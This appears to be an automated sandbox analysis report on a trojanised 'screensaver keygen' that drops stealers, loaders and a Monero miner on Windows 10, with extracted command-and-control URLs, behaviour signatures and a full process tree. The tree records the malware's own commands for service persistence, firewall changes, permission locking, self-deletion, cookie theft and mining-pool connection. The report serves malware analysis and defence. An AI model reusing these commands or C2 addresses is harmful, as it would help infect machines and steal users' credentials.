Overview

overview

10

Static

static

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

3

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

9

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

Analysis

  • max time kernel
    995s
  • max time network
    1029s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    20-11-2020 14:34

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe

  • Size

    10.5MB

  • MD5

    8103aad9a6f5ee1fb4f764fc5782822a

  • SHA1

    4fb4f963243d7cb65394e59de787aebe020b654c

  • SHA256

    4a5da8ebf650091c99c7a9d329ecb87533c337ab9e5642ff0355485ed419ec40

  • SHA512

    e65b7d2bdfda07a2ca22d109d39d98395915ee9ec486c44f358885e03bc3e9f9be0ce81706accbe412243ef8d62b9e364f6b1961cfe4469f3c3892821fccfae8

Score
10/10
agentteslaazorultplugxponyredlinesmokeloadertofseexmrigbackdoorbootkitdiscoveryevasioninfostealerkeyloggermacrominerpersistenceratspywarestealertrojanupxvmprotect

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://vintrsi.com/upload/

http://woatdert.com/upload/

http://waruse.com/upload/
rc4.i32
rc4.i32

Extracted

Family

smokeloader

Version

2019

C2

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

    trojanplugx
  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

    ratspywarestealerpony
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • AgentTesla Payload 2 IoCs
    keyloggerstealer
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 49 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macro
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 21 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spyware
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spyware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • JavaScript code in executable 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 38 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 5 IoCs
    evasion
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 325 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 2877 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 210 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 25 IoCs
  • Suspicious use of WriteProcessMemory 310 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
    "C:\Users\Admin\AppData\Local\Temp\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:492
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3680
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
        intro.exe 1O5ZF
        3⤵
        • Executes dropped EXE
        • Modifies system certificate store
        PID:1696
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1060
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
            • Executes dropped EXE
            PID:372
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
        keygen-step-1.exe
        3⤵
        • Executes dropped EXE
        PID:2992
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
        keygen-step-3.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3192
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2064
          • C:\Windows\SysWOW64\PING.EXE
            ping 1.1.1.1 -n 1 -w 3000
            5⤵
            • Runs ping.exe
            PID:1808
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
        keygen-step-4.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1436
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:1896
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1756
          • C:\Users\Admin\AppData\Local\Temp\sib3268.tmp\0\setup.exe
            "C:\Users\Admin\AppData\Local\Temp\sib3268.tmp\0\setup.exe" -s
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3604
            • C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe
              "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Modifies system certificate store
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:3436
              • C:\Windows\SysWOW64\msiexec.exe
                msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                7⤵
                • Enumerates connected drives
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1872
              • C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
                C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 0011 installp1
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks whether UAC is enabled
                • Writes to the Master Boot Record (MBR)
                • Suspicious use of SetThreadContext
                • Checks SCSI registry key(s)
                • Suspicious use of SetWindowsHookEx
                PID:2024
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  8⤵
                  • Suspicious use of SetWindowsHookEx
                  PID:2652
                • C:\Users\Admin\AppData\Roaming\1605884013220.exe
                  "C:\Users\Admin\AppData\Roaming\1605884013220.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605884013220.txt"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:1732
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  8⤵
                  • Suspicious use of SetWindowsHookEx
                  PID:2704
                • C:\Users\Admin\AppData\Roaming\1605884018501.exe
                  "C:\Users\Admin\AppData\Roaming\1605884018501.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605884018501.txt"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:2036
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  8⤵
                  • Suspicious use of SetWindowsHookEx
                  PID:3136
                • C:\Users\Admin\AppData\Roaming\1605884023908.exe
                  "C:\Users\Admin\AppData\Roaming\1605884023908.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605884023908.txt"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:3304
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  8⤵
                  • Suspicious use of SetWindowsHookEx
                  PID:1464
                • C:\Users\Admin\AppData\Roaming\1605884026595.exe
                  "C:\Users\Admin\AppData\Roaming\1605884026595.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605884026595.txt"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:1316
                • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                  C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:3352
                • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                  "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Writes to the Master Boot Record (MBR)
                  • Suspicious use of SetWindowsHookEx
                  PID:2028
                • C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe
                  C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:3972
                  • C:\Users\Admin\AppData\Local\Temp\is-G2IV3.tmp\1021C014A4C9A552.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-G2IV3.tmp\1021C014A4C9A552.tmp" /SL5="$D004A,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent
                    9⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    PID:3356
                    • C:\Program Files (x86)\RearRips\seed.sfx.exe
                      "C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s1
                      10⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious use of SetWindowsHookEx
                      PID:3448
                      • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                        "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                        11⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: MapViewOfSection
                        PID:2700
                    • C:\Windows\SysWOW64\cmd.exe
                      "cmd.exe" /c "start https://iplogger.org/14Ahe7"
                      10⤵
                      • Checks computer location settings
                      PID:3580
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
                  8⤵
                    PID:1136
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      9⤵
                      • Runs ping.exe
                      PID:3020
                • C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
                  C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 200 installp1
                  7⤵
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Writes to the Master Boot Record (MBR)
                  • Checks SCSI registry key(s)
                  • Suspicious use of SetWindowsHookEx
                  PID:3164
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    8⤵
                      PID:1232
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        9⤵
                        • Kills process with taskkill
                        PID:2000
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
                      8⤵
                        PID:1620
                        • C:\Windows\SysWOW64\PING.EXE
                          ping 127.0.0.1 -n 3
                          9⤵
                          • Runs ping.exe
                          PID:2884
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
                      7⤵
                        PID:2116
                        • C:\Windows\SysWOW64\PING.EXE
                          ping 127.0.0.1 -n 3
                          8⤵
                          • Runs ping.exe
                          PID:2376
                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
                  4⤵
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Modifies system certificate store
                  • Suspicious use of AdjustPrivilegeToken
                  PID:284
                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"
                  4⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:648
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    5⤵
                      PID:3332
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        6⤵
                        • Kills process with taskkill
                        PID:3504
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
                    4⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    PID:2520
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      5⤵
                      • Executes dropped EXE
                      PID:816
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      5⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1028
            • C:\Windows\system32\msiexec.exe
              C:\Windows\system32\msiexec.exe /V
              1⤵
              • Enumerates connected drives
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1968
              • C:\Windows\syswow64\MsiExec.exe
                C:\Windows\syswow64\MsiExec.exe -Embedding 95D6860A679612F04DD29DB8554E2FF9 C
                2⤵
                • Loads dropped DLL
                PID:1048
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
              1⤵
              • Drops file in Windows directory
              • Modifies Control Panel
              • Modifies Internet Explorer settings
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:196
            • C:\Windows\system32\browser_broker.exe
              C:\Windows\system32\browser_broker.exe -Embedding
              1⤵
              • Modifies Internet Explorer settings
              PID:3252
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies registry class
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:1168
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies Internet Explorer settings
              • Modifies registry class
              PID:1208
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies registry class
              PID:3068
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies registry class
              PID:4380
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies registry class
              PID:4468
            • C:\Users\Admin\AppData\Local\Temp\7486.exe
              C:\Users\Admin\AppData\Local\Temp\7486.exe
              1⤵
              • Executes dropped EXE
              • Adds Run key to start application
              PID:4580
              • C:\Windows\SysWOW64\icacls.exe
                icacls "C:\Users\Admin\AppData\Local\46018893-64e8-45b9-8cbb-256341c70a46" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                2⤵
                • Modifies file permissions
                PID:4988
              • C:\Users\Admin\AppData\Local\Temp\7486.exe
                "C:\Users\Admin\AppData\Local\Temp\7486.exe" --Admin IsNotAutoStart IsNotTask
                2⤵
                • Executes dropped EXE
                PID:5028
                • C:\Users\Admin\AppData\Local\152891f6-fe93-4a7f-89b3-0ecfae71b30c\updatewin1.exe
                  "C:\Users\Admin\AppData\Local\152891f6-fe93-4a7f-89b3-0ecfae71b30c\updatewin1.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:4836
                • C:\Users\Admin\AppData\Local\152891f6-fe93-4a7f-89b3-0ecfae71b30c\updatewin2.exe
                  "C:\Users\Admin\AppData\Local\152891f6-fe93-4a7f-89b3-0ecfae71b30c\updatewin2.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:4608
                • C:\Users\Admin\AppData\Local\152891f6-fe93-4a7f-89b3-0ecfae71b30c\5.exe
                  "C:\Users\Admin\AppData\Local\152891f6-fe93-4a7f-89b3-0ecfae71b30c\5.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:4788
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\152891f6-fe93-4a7f-89b3-0ecfae71b30c\5.exe & exit
                    4⤵
                      PID:5116
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /im 5.exe /f
                        5⤵
                        • Kills process with taskkill
                        PID:4972
              • C:\Users\Admin\AppData\Local\Temp\7571.exe
                C:\Users\Admin\AppData\Local\Temp\7571.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4612
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im 7571.exe /f & erase C:\Users\Admin\AppData\Local\Temp\7571.exe & exit
                  2⤵
                    PID:1252
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im 7571.exe /f
                      3⤵
                      • Kills process with taskkill
                      PID:4808
                • C:\Users\Admin\AppData\Local\Temp\79C7.exe
                  C:\Users\Admin\AppData\Local\Temp\79C7.exe
                  1⤵
                  • Executes dropped EXE
                  PID:4640
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\zynykxmt\
                    2⤵
                      PID:4860
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rqegursk.exe" C:\Windows\SysWOW64\zynykxmt\
                      2⤵
                        PID:4948
                      • C:\Windows\SysWOW64\sc.exe
                        "C:\Windows\System32\sc.exe" create zynykxmt binPath= "C:\Windows\SysWOW64\zynykxmt\rqegursk.exe /d\"C:\Users\Admin\AppData\Local\Temp\79C7.exe\"" type= own start= auto DisplayName= "wifi support"
                        2⤵
                          PID:5068
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\System32\sc.exe" description zynykxmt "wifi internet conection"
                          2⤵
                            PID:1804
                          • C:\Windows\SysWOW64\sc.exe
                            "C:\Windows\System32\sc.exe" start zynykxmt
                            2⤵
                              PID:4268
                            • C:\Windows\SysWOW64\netsh.exe
                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                              2⤵
                                PID:224
                            • C:\Users\Admin\AppData\Local\Temp\7D43.exe
                              C:\Users\Admin\AppData\Local\Temp\7D43.exe
                              1⤵
                              • Executes dropped EXE
                              PID:4668
                              • C:\Windows\SysWOW64\cmd.exe
                                /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\7D43.exe
                                2⤵
                                  PID:4704
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 3
                                    3⤵
                                    • Delays execution with timeout.exe
                                    PID:5080
                              • C:\Users\Admin\AppData\Local\Temp\8E7A.exe
                                C:\Users\Admin\AppData\Local\Temp\8E7A.exe
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:4696
                              • C:\Users\Admin\AppData\Local\Temp\97C2.exe
                                C:\Users\Admin\AppData\Local\Temp\97C2.exe
                                1⤵
                                • Executes dropped EXE
                                PID:5044
                                • C:\Windows\SysWOW64\cmd.exe
                                  "cmd.exe" /C ping 127.0.0.1 -n 3 > nul & del ""
                                  2⤵
                                    PID:5036
                                    • C:\Windows\SysWOW64\PING.EXE
                                      ping 127.0.0.1 -n 3
                                      3⤵
                                      • Runs ping.exe
                                      PID:4944
                                • C:\Users\Admin\AppData\Local\Temp\9FE1.exe
                                  C:\Users\Admin\AppData\Local\Temp\9FE1.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:3948
                                • C:\Windows\SysWOW64\zynykxmt\rqegursk.exe
                                  C:\Windows\SysWOW64\zynykxmt\rqegursk.exe /d"C:\Users\Admin\AppData\Local\Temp\79C7.exe"
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:2092
                                  • C:\Windows\SysWOW64\svchost.exe
                                    svchost.exe
                                    2⤵
                                    • Drops file in System32 directory
                                    • Modifies service
                                    • Suspicious use of SetThreadContext
                                    • Modifies data under HKEY_USERS
                                    PID:4460
                                    • C:\Windows\SysWOW64\svchost.exe
                                      svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                                      3⤵
                                        PID:4724
                                  • C:\Users\Admin\AppData\Local\Temp\AD8E.exe
                                    C:\Users\Admin\AppData\Local\Temp\AD8E.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:4928
                                  • C:\Users\Admin\AppData\Local\Temp\B5CD.exe
                                    C:\Users\Admin\AppData\Local\Temp\B5CD.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:4584
                                    • C:\Users\Admin\AppData\Local\Temp\B5CD.exe
                                      C:\Users\Admin\AppData\Local\Temp\B5CD.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: MapViewOfSection
